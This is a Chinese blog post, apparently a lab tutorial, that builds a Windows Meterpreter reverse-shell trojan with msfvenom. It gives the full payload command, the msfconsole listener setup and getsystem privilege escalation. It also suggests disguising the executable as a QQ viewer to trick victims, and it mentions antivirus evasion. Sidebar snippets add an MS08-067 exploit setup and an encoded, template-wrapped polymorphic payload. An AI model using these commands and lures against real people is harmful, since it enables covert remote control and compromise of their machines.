msfvenom使用

已于 2024-04-28 17:09:09 修改
阅读量458 收藏 9
点赞数 10
分类专栏: 主机攻防 文章标签: 网络安全 安全 系统安全 web安全 网络攻击模型
于 2024-01-21 14:12:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80361487/article/details/135729080
版权
实验环境:
攻击者: kali Linux ip 192.168.3.101
靶机: Windows xp ip 192.168.3.102
思路:
利用 msfvenom 制作 .exe 文件,然后发送到靶
Windows xp 上面,运行后就可以在 kali linux
上面利用 msfconsole 连接 msfvenom 服务控制靶
1. kali Linux 上面启动一个终端执行以下命令
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.3.101
lport=4444 -f exe >test.exe 输出文件到当前目录下
-p 选择一个 payload
-f 生成的文件格式
在这里,我们生成一个 test.exe 的木马文件
(文件在 root 文件夹下),控制端的 ip
192.168.3.101 ,端口号为 4444 。然后利用这
个木马传给靶机,可以改一改名字,比如 QQ
坦白说查看器之类的,杀毒软件可能报毒,其
实是需要免杀处理的
2. 利用 msfconsole 监听
输入以下命令:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.3.101
set lport 4444
run
handler -H ip -P 端口 -p
windows/meterpreter/reverse_tcp
快速建立监听通道
3.等待受害者点击test.exe文件 运行
4.文件被受害者点击运行后, 可以看到当前用户权限为 lll
使用 getsystem 命令获取系统最高用户的权限,可以进一步渗透
网安+硬件
关注
  • 10
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
msfvenom基本使用
02-24
以下是对 `msfvenom` 基本使用和相关知识点的详细解释: 1. **添加Payload**:`-p` 或 `--payload-options` 参数允许你选择要使用的payload类型。例如,`windows/meterpreter/reverse_tcp` 是一个常用的Windows平台...
附录一.msf常见案例
potato123232的博客
08-04 280
成功之后你就会获得用户名与密码(我用马赛克挡上了),获得了ssh我们就可以随便操作该机器的文件了,你可以使用putty。虽然PASS_FILE与USER_FILE显示的都不是必选参数,但是如果你不写就会报错,我动的是下面这三个参数。他们彼此可以ping通,从虚拟机ping到0网段的其他机器也可以ping通,但是到使用一些东西的时候就不行了。我把用户名与密码都放在两个文本文件的第一位了,我们直接看成功了之后我们可以怎么做。我们发现我们什么都没用扫描出来,但我们并非什么都没做,我们看一下服务端的日志。
msfvenom 基本使用
blackguest07的博客
03-05 1451
msfvenom 基础命令
Metasploit (MSF) 使用-包含基本使用、payload生成、后渗透模块使用
cc123489ll的博客
05-09 1138
l, --list <type> 列出指定模块的所有可用资源,包括:payloads,encodes,nops,all-p, --payload <payload> 指定所需要使用的payload,也可以使用自定义payload,几乎支持全平台-f, --format <format> 指定输出格式-e, --encoder <encoder> 指定需要使用的encode,指定需要使用的编码。
网络安全: Kali Linux 进行 MSFvenom 程序利用
cronaldo91的博客
03-06 1334
(6) 查看Kali Linux (2022.4)系统IP地址。(2)查看Kali Linux (2022.4)系统版本。(1)Ubuntu创建计划任务crontab程序。(7)Kali Linux 连接后门。(2)Kali Linux 连接后门。(13)Ubuntu再次后台运行。(4)Ubuntu查看权限。(6)Ubuntu后台执行。(15)查看用户权限及进程。(1)查看DES 对称加密。(9)设置响应的IP地址。(4)设置响应的IP地址。(10)设置响应的端口。(5)设置响应的端口。
metasploit运行run vnc
热门推荐
天元喜羊羊的博客
04-27 1万+
msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set RHOST 192.168.1.142 RHOST => 192.168.1.142 msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
msf之VNC身份识别
fake_hydra的博客
07-29 1635
use auxiliary/scanner/vnc/vnc_none_auth msf auxiliary(vnc_none_auth) > show options Module options (auxiliary/scanner/vnc/vnc_none_auth): Name Current Setting Required Descr
E025-渗透测试常用工具-使用msfvenom生成木马进行渗透测试.pdf
12-02
以下是对`msfvenom`的详细解释以及如何使用它生成木马进行渗透测试。 首先,`msfvenom`允许测试者创建不同类型的payload,这些payload可以在目标系统上执行特定的任务,如建立Meterpreter会话、执行命令或下载其他...
msfvenom常用生成payload命令(第十课).docx
09-15
MSFVenom 是 Metasploit Framework 中的一个组件,用于生成 Payload, Payload 是攻击者在攻击目标系统时使用的恶意代码。MSFVenom 提供了多种 Payload 生成方式,包括 Windows、Mac、Linux、Android 等多种平台。 ...
第三十课:解决msfvenom命令自动补全.docx
09-15
为了解决这个问题,我们将使用 zsh 的自动补全功能来简化 msfvenom使用。 首先,我们需要安装 oh-my-zsh 插件,然后创建一个名为 msfvenom 的文件夹在 ~/.oh-my-zsh/custom/plugins/ 目录下。在这个文件夹下,...
MSFVENOM_windows_payload_creator_V1.0:V1.0
05-03
MSFVENOM_windows_payload_creator_V1.0 V1.0 MSFVENOM Windows Payload Builder是一个简单的perl脚本,旨在简化创建可自定义的Windows可执行文件的任务。 该脚本使用Shikata_na_gai mfsvenon模块创建有效负载可执行...
vnc如何连接,vnc如何连接,连接教程详解
zhongqill的博客
08-11 7728
vnc如何连接,这是之前困扰了小编很久的问题,当时因为急需,所以找了很久的教程,还下载了很多vnc连接软件,后来才终于弄明白vnc如何连接的。接下来小编就分享一下自己的经验吧。 使用工具:IIS7服务器管理工具 这个工具里面的VNC功能可以说是使用感非常棒的。它可以一键导出或导入,还可以一键批量打开VNC,还可以一键批量关闭VNC,还有到期提醒,还有多台VNC 自定义备注,自定义分组。最后还支持win、linux批量管理,这是非常好用的功能了。能省去您一台台记录IP、密码,点下就能瞬间打开。 IIS7服务器
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8334
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
AI安全系列——[第五空间 2022]AI(持续更新)
最新发布
2201_76139143的博客
07-15 703
最近很长时间没有更新,其实一直在学习AI安全,我原以为学完深度学习之后再学AI安全会更加简单些,但是事实证明理论转实践还是挺困难的,但是请你一定要坚持下去,因为“不是所有的坚持都有结果,但总有一些坚持,能从冰封的土地里,培育出十万朵怒放的蔷薇”题目来源:NSSCTF题目描述:噪声在大数据场景下有着重要的地位。工程师们苦于被噪声污染的数据,同时也使用噪声保护着隐私数据。这个挑战分为两个部分。挑战1:从噪声中恢复隐私向量有A,B两个实体。其中B是普通实体,A则是恶意攻击者。
医疗健康信息的安全挑战与隐私保护最佳实践
2301_79955948的博客
07-12 1296
随着医疗信息化的发展,医疗健康数据呈现出爆炸式的增长,医院信息系统、电子病历、健康管理等产生了海量的数据,这些数据的管理和保护成为了巨大的挑战。最新的研究和政策动态显示,国家卫生健康委员会等政府部门正在积极推动医疗健康信息安全管理规范的制定和实施,以加强数据安全和个人健康医疗数据相关的隐私保护。隐私保护的最佳实践包括建立完善的数据安全管理制度、规范医疗健康数据的收集、存储和传输过程,防止数据泄露。这些要求和措施有助于确保医疗健康信息的安全性和个人隐私的保护,减少信息泄露的风险,并促进医疗行业的健康发展。
安全防御-用户认证综合实验
weixin_69863399的博客
07-12 365
生产区访问DMZ需要进行protal认证,设立生产区用户架构,至少包含三个部门,每个部门三个用户,用户统一密码openlab@123,首次登录需要修改密码,用户过期时间设定为10天,用户不允许多人使用。游客区人员不固定,不允许访问DMZ区和生产区,统一使用Guest用户登录,密码Admin@123,游客仅有访问公司门户网站和上网的权利,门户网站地址10.0.3.10。做相关的认证策略,研发部IP地址(10.0.1.20)固定,访问DMZ区使用匿名认证,研发部需要用户绑定IP地址,访问DMZ区使用免认证;
高效守护:在Eureka中构筑服务的分布式安全防线
2401_85341950的博客
07-15 543
通过上述步骤和代码示例,我们展示了如何在Eureka中实现服务的分布式安全策略。这包括服务认证、授权机制的实现,以及数据传输加密等关键安全措施。Eureka作为服务发现框架,在分布式安全体系中发挥着核心作用。在微服务架构中,服务的安全性不容小觑。通过本文的介绍,我们希望能够帮助读者更好地理解和实现Eureka中的分布式安全策略,确保微服务之间的通信安全,构建一个更加安全、可靠的系统。注意:本文中的代码示例为简化模型,实际应用中应根据具体需求和安全标准进行选择和实现。
非法闯入智能监测摄像机:安全守护的新利器
bova2022的博客
07-15 213
首先,它能够智能分析画面中的人物和物体,通过对比数据库识别可疑目标,自动过滤正常活动,减少误报。此外,很多智能摄像机支持远程监控,用户可以随时通过手机或电脑查看实时画面,确保安全无死角。在商业环境中,摄像机可以有效防止盗窃和破坏,提升商业安全防范水平。总之,非法闯入智能监测摄像机作为现代安防技术的重要组成部分,以其智能、高效的特性,正不断提升人们的安全感。随着技术的持续发展和应用场景的扩大,未来这些摄像机将在保护人们生命和财产安全方面发挥更加重要的作用,为我们的生活带来更多保障。
使用Python实现深度学习模型模型安全与防御
Echo_Wish的博客
07-12 477
通过以上步骤,我们实现了一个简单的深度学习模型安全与防御。我们使用CleverHans库生成对抗性样本,并通过对抗性训练提高模型的防御能力。对抗性样本是通过对原始输入进行微小扰动生成的,目的是欺骗模型。我们将使用CleverHans库生成对抗性样本。为了提高模型的防御能力,我们可以使用对抗性训练的方法。对抗性训练是将对抗性样本加入到训练集中进行训练。我们将使用MNIST数据集训练一个简单的卷积神经网络(CNN)模型。我们可以通过对抗性样本评估防御后的模型效果。首先,我们需要安装所需的Python库。
msfvenom 实现多态技术的使用方法
05-31
msfvenom 是 Metasploit 框架中的一个非常强大的工具,可以用来生成各种类型的恶意代码,包括多态代码。下面是使用 msfvenom 实现多态技术的基本步骤: 1. 生成 payload:首先需要使用 msfvenom 生成一个 payload,例如 Windows 反向 Meterpreter shell: ``` msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your IP> LPORT=<your port> -f raw > payload.bin ``` 2. 生成多态 payload:接下来,使用 msfvenom 的 -x 选项来指定多态模块,例如使用 shikata_ga_nai 模块: ``` msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your IP> LPORT=<your port> -e x86/shikata_ga_nai -i 10 -x /usr/share/windows-binaries/plink.exe -f exe > polymorphic_payload.exe ``` 在这个例子中,我们使用 x86/shikata_ga_nai 编码器和 -i 10 选项来生成 10 个不同的变形版本,然后使用 -x 选项指定 plink.exe 作为多态模块。 3. 检测多态性:最后,使用反病毒软件等工具来检测生成的多态 payload,以确保其有效性。 需要注意的是,多态技术虽然可以增加恶意代码的隐蔽性,但并不能完全避免被检测和分析,因此还需要结合其他安全措施来保护系统安全

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

网安+硬件

生活不易,但愿极客精神与你同在

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值